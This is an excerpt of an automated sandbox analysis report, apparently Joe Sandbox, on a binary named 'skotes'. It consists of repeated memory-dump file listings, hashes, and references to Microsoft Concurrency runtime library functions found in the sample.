                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                            • API String ID: 2663199487-3650809737
                                                                                                                                                                                            • Opcode ID: 924434ae03371d47c515508939b33fdc189c51f885775aee274e35c9e1f23c96
                                                                                                                                                                                            • Instruction ID: 192ec963e2f9b3809b3ccd5154da1dd3db5425479d6c1faf84fcdfc2c6ba78c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 924434ae03371d47c515508939b33fdc189c51f885775aee274e35c9e1f23c96
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8221CF34600A25EFCB14EFA8D991EAD77B6BF88311F00406DE9069B691DF71AE01CF55
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0062BA0E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                            • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                            • API String ID: 348560076-3997890769
                                                                                                                                                                                            • Opcode ID: 0308895d99c35ac777da429b823336fdc9b6d31e6b5d32312091f5a05a58bb77
                                                                                                                                                                                            • Instruction ID: d88c58ef888dab857e7a55b289100f95a1c5274aeee091157ca67610c7eaecf8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0308895d99c35ac777da429b823336fdc9b6d31e6b5d32312091f5a05a58bb77
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201F961A81B3569DB14B7B56C0ABBB369EDF02304F203C2DF441E7282EFA5C8004EA5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SafeRWList.LIBCONCRT ref: 00626E73
                                                                                                                                                                                              • Part of subcall function 00624E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00624E7F
                                                                                                                                                                                              • Part of subcall function 00624E6E: List.LIBCMT ref: 00624E89
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00626E85
                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00626EAA
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: eventObject
                                                                                                                                                                                            • API String ID: 1288476792-1680012138
                                                                                                                                                                                            • Opcode ID: bf145a7524e9fc019c8c59956be31f39e71ebe038154a5ad6ca92b64b2c3605a
                                                                                                                                                                                            • Instruction ID: 41b0325bbd25edd4cff50b2a847bae462a76e8656a9d25c96287a3f8ab926f8f
                                                                                                                                                                                            • Opcode Fuzzy Hash: bf145a7524e9fc019c8c59956be31f39e71ebe038154a5ad6ca92b64b2c3605a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D114876540224E7CF24EBA4DC4AFEE73796F04310F214118B844AA1C2EB70DE04CBB5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0062A102
                                                                                                                                                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0062A126
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0062A139
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
